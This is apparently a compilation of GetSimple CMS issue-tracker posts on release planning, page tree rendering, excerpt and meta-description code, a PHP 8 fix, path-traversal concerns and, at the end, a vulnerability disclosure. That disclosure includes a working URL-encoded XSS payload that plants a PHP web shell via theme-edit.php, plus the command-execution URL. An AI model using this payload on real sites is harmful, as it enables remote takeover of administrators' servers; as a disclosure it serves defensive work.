Original author: ccagle8 (November 03, 2010 03:40:31)

http://get-simple.info/forum/topic/1103/strtotime-instead-of-strftime-function/

looks like we need to use iconv in basic.php where we output the date in both long and short format

Original issue: http://code.google.com/p/get-simple-cms/issues/detail?id=85

I would like to start planning the next release and figure out if we are going to just cut everything we have done since 3.1.2 into 3.1.3.

There are no critical security or bugfixes I know of so i am fine with that, provided we beta it a bit.

We can create a milestone, and create any features or bugs we have to get into it.

We can start with the release notes, the changelist is below, we can copy it and clean it up and add the issue notes to the individual issues. Or maye i can wrtie something to grab all this togather automatically.

https://github.com/GetSimpleCMS/GetSimpleCMS/compare/v3.1.2...master

Start using our wiki for the output perhaps. And to detail any new functions or functionality we added etc.

We need tabs in admin pages. How should we implement them ? from scratch using css or using jquery-ui tabs ?

Thoughts.

For example in pages, pages options get larger and larger, we need tabs so we can add, history, meta, options, backups, drafts.

I think there was no issue for this, so: http://get-simple.info/forums/showthread.php?tid=3056

More comments about this here: http://get-simple.info/forums/showthread.php?tid=2624&pid=23591#pid23591

• [x] rewritten tree renderer get_pages_menu
• [x] js tree folding
• [x] collapse / expand top ancestors
• [x] save state
• [x] disable able, fall back to standard indentation with no js
• [x] pure css indentation and expanders
• custom , lightweight , optimized, possibly ported to other tree usage in core
• uses no recursion, level-order walking
• requires only depth and parent markers on nodes, extremely fast to generate lists

500 page lists are rendered in 350ms plus js, can probably eventually be cached, and allow multiple hierarchies to be applied. Improvements over previous pages render code is about 30-90% faster depending on page set size. A small step in resolving larger sites issues and over 1 second admin pages load times. Should be able to reasonable handle several thousand pages without core modification. Of course there is more work here for pagination, menu organization etc. #516

I can probably add some checks to avoid js generation of expanders etc if they are pre populated in html. Right now its all done in js for ease of implementation and portability.

wow I tried to find this exact exploit and somehow missed it.

POST['LANG'] is the most common damn code insertion path traversal vulnerability. and we have it with no sanitation whatsoever.

http://packetstormsecurity.com/files/119298

1832604ea7da7773ad4f0aa3244d4e4ea03e00e4 (974dad0948a69bd47e455d35107105e78da030af da00eef8a78c0633f384d103b8219fa8d7b59f71) #736

replaced this with abstracted function for truncating any string

/**
*  getExcerpt
 * Get String Excerpt
 *
 * @since 3.3.2
 *
 * @uses mb_strlen
 * @uses mb_strrpos
 * @uses mb_substr
 * @uses strip_tags
 * @uses strIsMultibyte
 *
 * @param string $n Optional, default is 200.
 * @param bool $striphtml Optional, default true, true will strip html from $content
 * @param string $ellipsis Optional, Default '...', specify an ellipsis
 * @return string
 */

Will break on last word boundary to prevent splitting words. This probably needs to be smarter and add features to make it useful, right now it is not that reliable.

We allow not stripping html tags which allows for open tags and broken html. This is a bug to me.

• [ ] ~~prevent splitting on html tags~~ , probably unnecessary, cleaning html, to auto close tags, will also remove non matched end tags
• [x] auto close html tags so it is actually safe to use rich excerpts, I have a solution for this
• [x] no breaking ( force split where I say so )
• [x] default to strip tags ( not the opposite )
• [ ] filter ?
• [x] handle unicode word boundaries properly, not just ascii spaces

1. Create sub page for index page.
2. Turn on FancyURLs with %parent%/%slug%/ pattern.

Now created sub page has an address http://site-url/index/sub-page/

Navigate to it and you will get index page, not sub page.

Front end data leakage.

I can probe for valid files, and easily bypass the front end path traversal id filtering.

I can probe for valid usernames based on the 404 or not. Fortunately we are loading in xml from this and not directly exposing any, but its just a matter of time before I find a way to output some other data from any other file.

Since I can force the file to actually be read anywhere in the filesystem, I can probably trip this up with certain plugins to expose the actual data in the file. I do not have a proof for that yet.

IMHO, content must be processed before including template (мaybe with index-pretemplate hook). This gives more flexibility in the use of shortcodes in page content. Now shortcodes have no access to page header, and they cannot add required stuff into it (CSS, JavaScript, tags).

If a page has no 'Meta Description' set and GSAUTOMETAD is true, then any page which contains inline <style></style> tags will pollute the 'Meta Description' with CSS declarations. The same situation applies with <script></script> tags.

This occurs because strip_tags() is called on the description which removes the tags, but not the declarations therein. A solution might be to remove the contents of the tags before calling strip_tags.

This could be archeived by using preg_replace or preg_match, but this is not the most reliable solution. So, I suggest the following changes to the code; it uses the DOMDocument class to handle the removal of the script and style tags before it has strip tags applied to it:

Before:

    // meta description from v3.3.5
    if ($metad != '') {
        $description = get_page_meta_desc(FALSE);
    } 
    else if(getDef('GSAUTOMETAD',true))
    {
        // get meta from content excerpt
        if (function_exists('mb_substr')) { 
            $description = trim(mb_substr(strip_tags(strip_decode($content)), 0, 160));
        } else {
            $description = trim(substr(strip_tags(strip_decode($content)), 0, 160));
        }

        $description = str_replace('"','', $description);
        $description = str_replace("'",'', $description);
        $description = preg_replace('/\n/', " ", $description);
        $description = preg_replace('/\r/', " ", $description);
        $description = preg_replace('/\t/', " ", $description);
        $description = preg_replace('/ +/', " ", $description);
    }

    if(!empty($description)) echo '<meta name="description" content="'.$description.'" />'."\n";

After

  // New Meta Description
  if (!empty($metad)) 
  {
    $description = get_page_meta_desc(false);
  }
  elseif (getDef('GSAUTOMETAD',true)) 
  {
    # Generate Meta Description from content excerpt
    # Updated to handle 'script' & 'style' tags by also removing their content.
    # @uses: DOMDocument | @modifies: $description
    # Written 2015-06-03 04:00am by GitHub: johnstray
    $dom = new DOMDocument('1.0','UTF-8');
    $dom->loadHTML($description);
    $scripts = $dom->getElementsByTagName('script');
    $styles = $dom->getElementsByTagName('style');
    while ( ($node = $scripts->item(0)) || ($node = $styles->item(0)) ) {
        $node->parentNode->removeChild($node);
    }

    // Replace multipe preg_replace() with single containing '\s' (white-space)
    // The covers all the previous \n, \r & \t replacements
    $description = preg_replace('/\s+/', ' ', trim(strip_tags($dom->saveHTML())));
    $description = str_replace('"','', str_replace("'",'', $description));
  }
  if(!empty($description)) echo '<meta name="description" content="'.$description.'" />'."\n";

:eyes: Some source code analysis tools can help to find opportunities for improving software components. :thought_balloon: I propose to increase the usage of combined operators accordingly.

diff --git a/admin/inc/ZipArchive.php b/admin/inc/ZipArchive.php
index 22db69ad..1d83a269 100644
--- a/admin/inc/ZipArchive.php
+++ b/admin/inc/ZipArchive.php
@@ -175,7 +175,7 @@ class ZipArchive  {
 		//create temp dir
 		$tempDir = sys_get_temp_dir();
 		if( $tempDir[strlen($tempDir)-1] != DIRECTORY_SEPARATOR ){
-			$tempDir = $tempDir . DIRECTORY_SEPARATOR;
+			$tempDir .= DIRECTORY_SEPARATOR;
 		}
 		$this->tempDirPath =  $tempDir.__CLASS__. uniqid();
 		if( @mkdir($this->tempDirPath) !== true ) {
diff --git a/admin/inc/assets.php b/admin/inc/assets.php
index 43321664..6cb2a648 100644
--- a/admin/inc/assets.php
+++ b/admin/inc/assets.php
@@ -378,7 +378,7 @@ function queue_script($handle,$where){
         }
 
         $GS_scripts[$handle]['load']  = true;
-        $GS_scripts[$handle]['where'] = $GS_scripts[$handle]['where'] | $where;
+        $GS_scripts[$handle]['where'] |= $where;
   }
 }
 
@@ -396,7 +396,7 @@ function dequeue_script($handle, $where){
   global $GS_scripts;
   if (array_key_exists($handle, $GS_scripts)){
     $GS_scripts[$handle]['load']  = false;
-    $GS_scripts[$handle]['where'] = $GS_scripts[$handle]['where'] & ~ $where;
+    $GS_scripts[$handle]['where'] &= ~ $where;
   }
 }
 
@@ -491,7 +491,7 @@ function queue_style($handle,$where = 1){
     }
 
     $GS_styles[$handle]['load'] = true;
-    $GS_styles[$handle]['where'] = $GS_styles[$handle]['where'] | $where;
+    $GS_styles[$handle]['where'] |= $where;
   }
 }
 
@@ -509,7 +509,7 @@ function dequeue_style($handle,$where){
   global $GS_styles;
   if (array_key_exists($handle, $GS_styles)){
     $GS_styles[$handle]['load'] = false;
-    $GS_styles[$handle]['where'] = $GS_styles[$handle]['where'] & ~$where;
+    $GS_styles[$handle]['where'] &= ~$where;
   }
 }
 
diff --git a/admin/inc/basic.php b/admin/inc/basic.php
index c970df7f..7ad5371d 100644
--- a/admin/inc/basic.php
+++ b/admin/inc/basic.php
@@ -547,7 +547,7 @@ function createPageXml($title, $url = null, $data = array(), $overwrite = false)
 	// If overwrite is false do not use existing slugs, get next incremental slug, eg. "slug-count"
 	if ( !$overwrite && (file_exists(GSDATAPAGESPATH . $url .".xml") ||  in_array($url,$reservedSlugs)) ) {
 		list($newfilename,$count) = getNextFileName(GSDATAPAGESPATH,$url.'.xml');
-		$url = $url .'-'. $count;
+		$url .= '-'. $count;
 		// die($url.' '.$newfilename.' '.$count);
 	}
 
diff --git a/admin/inc/caching_functions.php b/admin/inc/caching_functions.php
index ab84c4a6..8b8ad5a9 100644
--- a/admin/inc/caching_functions.php
+++ b/admin/inc/caching_functions.php
@@ -273,7 +273,7 @@ function fixupPageFilenames($path,$file,$id,$pageXml){
 	// get slug from filename and increment if exists
 	// if(file_exists(GSDATAPAGESPATH . $id .".xml")){
 	// 	list($id,$count) = getNextFileName(GSDATAPAGESPATH,$id.'.xml');
-	// 	$id = $id .'-'. $count;
+	// 	$id .= '-'. $count;
 	// }
 	debugLog(__FUNCTION__ . ' ' .$id . ' -> ' . $file);
 	backup_datafile(GSDATAPAGESPATH.$file);
diff --git a/admin/inc/imagemanipulation.php b/admin/inc/imagemanipulation.php
index 2b776791..f9cbdb17 100644
--- a/admin/inc/imagemanipulation.php
+++ b/admin/inc/imagemanipulation.php
@@ -114,15 +114,15 @@ class ImageManipulation {
 		$cropsize = 0;
 
 		if($this->crop == true){
-			// $size = $size*2;
+			// $size *= 2;
 			list($image_width,$image_height) = $this->getCropSize();
 			$cropsize += round( ($image_width * $image_height * ($image_bits * $image_channels) / 8) );
 		}
 
 		// print_r('src:'.toBytesShorthand($size,'m',true)."<br>");
 		// print_r('crop:'.toBytesShorthand($cropsize,'m',true)."<br>");
-		$size = $size + $cropsize;
-		return $size = $size * $adjust;
+		$size += $cropsize;
+		return $size *= $adjust;
 	}
 
     /**
diff --git a/admin/inc/template_functions.php b/admin/inc/template_functions.php
index 170ee4ad..ca0d4b63 100644
--- a/admin/inc/template_functions.php
+++ b/admin/inc/template_functions.php
@@ -405,7 +405,7 @@ function clone_page($id){
 	$newxml = getPageXML($id);
 	$newurl = getFileName($cloneurl);
 	$newxml->url = getFileName($cloneurl);
-	$newxml->title = $newxml->title.' ['.sprintf(i18n_r('COPY_N',i18n_r('COPY')),$count).']';
+	$newxml->title .= ' ['.sprintf(i18n_r('COPY_N',i18n_r('COPY')),$count).']';
 	$newxml->pubDate = date('r');
 	$status = XMLsave($newxml, GSDATAPAGESPATH.$cloneurl);
 	if($status) return $newurl;
@@ -926,7 +926,7 @@ function get_link_menu_array($parent='', $array=array(), $level=0) {
 		foreach ($items as $page) {
 		  	$dash="";
 		  	if ($page['parent'] != '') {
-	  			$page['parent'] = $page['parent']."/";
+	  			$page['parent'] .= "/";
 	  		}
 			for ($i=0;$i<=$level-1;$i++){
 				if ($i!=$level-1){
@@ -1025,7 +1025,7 @@ function getPagesRow($page,$level,$index,$parent,$children){
 	// add expanders in php
 	// $expander = '<span class="tree-expander tree-expander-expanded"></span>';
 	// $expander = $isParent ? $expander : '<span class="tree-indent"></span>';
-	// $indentation = $indentation . $expander;
+	// $indentation .= $expander;
 
 	// depth level identifiers
 	$class  = 'depth-'.$level;
@@ -1255,7 +1255,7 @@ function get_pages_menu($parent = '',$menu = '',$level = '') {
 			 $depth = $page['depth']; continue;
 			}	
 			else if(($page['depth'] == $depth)) return $menu; // we are back to starting depth so stop
-			$level = $level - ($depth+1);
+			$level -= $depth + 1;
 		}	
 
 		// provide special row if this is a missing parent
@@ -1300,7 +1300,7 @@ function get_pages_menu_dropdown($parentitem, $menu, $level, $id = null, $idleve
 		  	$dash="";
 
 		  	if ($page['parent'] != '') {
-	  			$page['parent'] = $page['parent']."/";
+	  			$page['parent'] .= "/";
 	  		}
 
 			for ($i=0;$i<=$level-1;$i++){
diff --git a/admin/theme-edit.php b/admin/theme-edit.php
index fb89e51f..0670036a 100644
--- a/admin/theme-edit.php
+++ b/admin/theme-edit.php
@@ -210,7 +210,7 @@ function editor_array2ul($array, $hideEmpty = true, $recurse = true) {
 		}
 	}
 
-	$out=$out."</ul>";
+	$out .= "</ul>";
 	return $out;
 }
 
diff --git a/admin/upload.php b/admin/upload.php
index 0b2e7dda..1e878828 100644
--- a/admin/upload.php
+++ b/admin/upload.php
@@ -227,7 +227,7 @@ $isUnixHost = !hostIsWindows();
 						$ss = @stat($path . $file);
 						$filesArray[$count]['date'] = @date('M j, Y',$ss['ctime']);
 						$filesArray[$count]['size'] = fSize($ss['size']);
-						$totalsize = $totalsize + $ss['size'];
+						$totalsize += $ss['size'];
 						$count++;
 					}
 				}

(Running under PHP 8.0) When logging in to the admin backend, the following php error occurs...

Fatal error: Uncaught error: Call to undefined function get_magic_quotes_gpc() in /admin/inc/basic.php:1461

Quoting from the PHP.net manual for get_magic_quotes_qpc():

"Warning This function has been DEPRECATED as of PHP 7.4.0, and REMOVED as of PHP 8.0.0. Relying on this function is highly discouraged.

Further information relating to this, plus a possible workaround can be found in this StackOverflow question

The StackOverflow question above suggests to use mysql_real_escape_string(), however this has also been depreciated in PHP 5.5.0 and removed in PHP 7.0.0, resulting in basically the same fatal php error. My suggestion instead is the code below, tested to work on PHP 8.0.0 with GS v3.4.0.9-alpha :

/**
 * Safe AddSlashes HTML
 *
 * @since 2.04, 3.4.0
 * @author ccagle8, johnstray
 *
 * @param string $text
 * @return string
 */
function safe_slash_html ( $text ) {
    $text = addslashes( htmlspecialchars( $text, ENT_QUOTES, 'UTF-8' ) );
    return xmlFilterChars( $text );
}

Hi there,

I couldn't find a SECURITY.md in your repository and am not sure how to best contact you privately to disclose a security issue.

Can you add a SECURITY.md file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a security policy is the best way to make sure security issues are responsibly disclosed.

Once you've done that, you should receive an e-mail within the next hour with more info.

Thanks! (cc @huntr-helper)

An XSS that leads to RCE is found at theme.php

Exploit URL: http://example.com/admin/theme.php/XSS/javascript:alert(1);%252f%252f%252f%252f

An attacker can make request using XSS to theme-edit.php to add malicious php code that leads to RCE.

RCE Payload:

http://example.com/admin/theme.php/XSS/javascript:var%20s%3DdecodeURIComponent%28%22%252f%22%29%3Bvar%20h%3D%22application%22%2Bs%2B%22x-www-form-urlencoded%22%3Bvar%20e%3Dfunction%28i%29%7Breturn%20encodeURIComponent%28i%29%7D%3Bvar%20u1%3Ds%2B%22admin%22%2Bs%3Bvar%20u2%3Du1%2B%22theme-edit.php%22%3Bvar%20xhr1%3Dnew%20XMLHttpRequest%28%29%3Bvar%20xhr2%3Dnew%20XMLHttpRequest%28%29%3Bxhr1.onreadystatechange%3Dfunction%28%29%7Bif%28xhr1.readyState%3D%3D4%26%26xhr1.status%3D%3D200%29%7Br%3Dthis.responseXML%3BnVal%3Dr.querySelector%28%22%23nonce%22%29.value%3BeVal%3Dr.forms%5B1%5D%5B2%5D.defaultValue%3Bxhr2.open%28%22POST%22%2Cu2%2Ctrue%29%3Bxhr2.setRequestHeader%28%22Content-Type%22%2Ch%29%3Bpayload%3De%28%22%3C%3Fphp%20passthru%28%24_GET%5Bcmd%5D%29%20%3F%3E%22%29%3Bparams%3D%22nonce%3D%22%2BnVal%2B%22%26content%3D%22%2Bpayload%2B%22%26edited_file%3D%22%2BeVal%2B%22%26submitsave%3DSave%2BChanges%22%3Bxhr2.send%28params%29%7D%7D%3Bxhr1.open%28%22GET%22%2Cu2%2Ctrue%29%3Bxhr1.responseType%3D%22document%22%3Bxhr1.send%28%29%3B%252f%252f%252f%252f

Note: An Attacker Send the Malicious URL to authenticated User as soon as victim click the "Activate Theme" Button RCE Payload will be executed.

After Victim Click the Buttom, Attacker can execute system command from http://example.com/index.php?cmd=id